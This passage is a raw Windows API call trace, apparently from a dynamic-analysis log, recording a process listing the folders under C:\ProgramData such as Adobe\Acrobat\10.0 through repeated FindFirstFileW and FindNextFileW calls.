hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f0bc) returned 1 [0134.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f0c8) returned 1 [0134.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f0fc) returned 1 [0134.098] GetFullPathNameW (in: lpFileName="C:\\ProgramData", nBufferLength=0x105, lpBuffer=0x6e4ec04, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData", lpFilePart=0x0) returned 0xe [0134.098] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x105, lpBuffer=0x6e4ebd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x0) returned 0xf [0134.098] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x6e4ee24 | out: lpFindFileData=0x6e4ee24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.098] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.098] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0134.098] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0134.098] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0134.099] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0134.099] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0134.099] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0134.099] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0134.099] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0134.099] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0134.099] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0134.100] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0134.100] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0134.100] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0134.100] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ee34 | out: lpFindFileData=0x6e4ee34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.100] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f0bc) returned 1 [0134.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f0c8) returned 1 [0134.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f0ac) returned 1 [0134.100] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe", nBufferLength=0x105, lpBuffer=0x6e4ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe", lpFilePart=0x0) returned 0x14 [0134.100] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\", nBufferLength=0x105, lpBuffer=0x6e4eb88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\", lpFilePart=0x0) returned 0x15 [0134.100] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\*", lpFindFileData=0x6e4edd4 | out: lpFindFileData=0x6e4edd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.101] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.101] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0134.101] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0134.101] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 0 [0134.102] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f06c) returned 1 [0134.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f078) returned 1 [0134.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f0ac) returned 1 [0134.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe", nBufferLength=0x105, lpBuffer=0x6e4ebb4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe", lpFilePart=0x0) returned 0x14 [0134.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\", nBufferLength=0x105, lpBuffer=0x6e4eb88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\", lpFilePart=0x0) returned 0x15 [0134.102] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\*", lpFindFileData=0x6e4edd4 | out: lpFindFileData=0x6e4edd4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.102] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.102] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0134.102] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0134.103] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ede4 | out: lpFindFileData=0x6e4ede4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.103] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f06c) returned 1 [0134.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f078) returned 1 [0134.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f05c) returned 1 [0134.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x6e4eb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x1c [0134.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x6e4eb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x1d [0134.103] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x6e4ed84 | out: lpFindFileData=0x6e4ed84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.103] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.104] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0134.104] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0134.104] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f01c) returned 1 [0134.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f028) returned 1 [0134.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f05c) returned 1 [0134.104] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x6e4eb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x1c [0134.104] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x6e4eb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x1d [0134.104] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x6e4ed84 | out: lpFindFileData=0x6e4ed84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.104] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.105] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0134.105] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0134.105] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f01c) returned 1 [0134.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f028) returned 1 [0134.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f00c) returned 1 [0134.105] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x6e4eb14, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x21 [0134.105] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x6e4eae8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x22 [0134.105] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x6e4ed34 | out: lpFindFileData=0x6e4ed34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77abf0 [0134.106] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0134.106] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0134.106] FindNextFileW (in: hFindFile=0x77abf0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0134.106] FindClose (in: hFindFile=0x77abf0 | out: hFindFile=0x77abf0) returned 1 [0134.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efcc) returned 1 [0134.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efd8) returned 1 [0134.106] SetThreadErrorMode 